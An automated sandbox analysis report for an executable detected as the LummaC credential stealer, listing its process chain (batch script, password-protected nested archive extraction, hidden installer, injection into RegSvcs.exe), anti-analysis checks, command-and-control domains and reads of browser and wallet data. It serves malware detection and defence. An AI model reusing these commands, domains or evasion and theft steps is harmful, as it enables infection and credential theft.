Windows Analysis Report
file.exe

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004029A6 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: String function: 00252330 appears 36 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefilezilla.exe6 vs file.exe
Source: file.exe, 00000000.00000003.2087206791.0000000002670000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.exe, vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.exe, vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.dll, vs file.exe
Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs file.exe
Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7z.dll, vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamefilezilla.exe6 vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/17@3/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00409606

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_0024AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		5_2_0024AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_00251D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,		5_2_00251D04

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040122A GetDiskFreeSpaceExW,SendMessageW,

0_2_0040122A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,

0_2_004092C1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_004020BF

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\main

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: file.exe	ReversingLabs: Detection: 31%
Source: file.exe	Virustotal: Detection: 14%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Section loaded: propsys.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Contains functionality to detect sleep reduction / modifications

Source: file.exe

Static file information: File size 3376184 > 1048576

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_00402665

Source: Installer.exe.9.dr	Static PE information: real checksum: 0x795ad should be: 0xe0b11
Source: 7z.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: 7z.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004192C0 push eax; ret		0_2_004192EE
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_0026676A push rcx; ret		5_2_0026676B

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

11_2_00251280

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_00251280		11_2_00251280
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_00251290		11_2_00251290

Source: C:\Users\user\Desktop\file.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

API coverage: 5.1 %

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Code function: 11_2_00251290

11_2_00251290

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 6412

Thread sleep time: -40000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_0040367D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_00247978 FindFirstFileW,FindFirstFileW,free,	5_2_00247978
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_0025A151 FindFirstFileExW,	11_2_0025A151

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 5_2_0024881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

5_2_0024881C

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 5_2_0024B5E0 GetSystemInfo,

5_2_0024B5E0

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Thread delayed: delay time: 40000

Allocates memory in foreign processes

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000002.2123014561.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000002.2123014561.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000003.2122322581.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2318932004.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ha^
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4a

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 12_2_0043E470 LdrInitializeThunk,

12_2_0043E470

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Code function: 11_2_002520FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_002520FF

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_00402665

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_0025B52D mov eax, dword ptr fs:[00000030h]		11_2_0025B52D
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_00256B54 mov eax, dword ptr fs:[00000030h]		11_2_00256B54

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Code function: 11_2_0025BFD4 GetProcessHeap,

11_2_0025BFD4

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_002520FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_002520FF
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_00252262 SetUnhandledExceptionFilter,	11_2_00252262
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_00255E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00255E89
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Code function: 11_2_00252375 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00252375

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: p3ar11fter.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: 3xp3cts1aim.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: peepburry828.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: p10tgrace.sbs
Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: processhol.sbs

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 990008			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00402744

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 5_2_0028D670 cpuid

5_2_0028D670

Source: C:\Users\user\Desktop\file.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_0040247D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_004039E7

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00405BFC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara detected LummaC Stealer

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Installer.exe.35f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Installer.exe.35f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
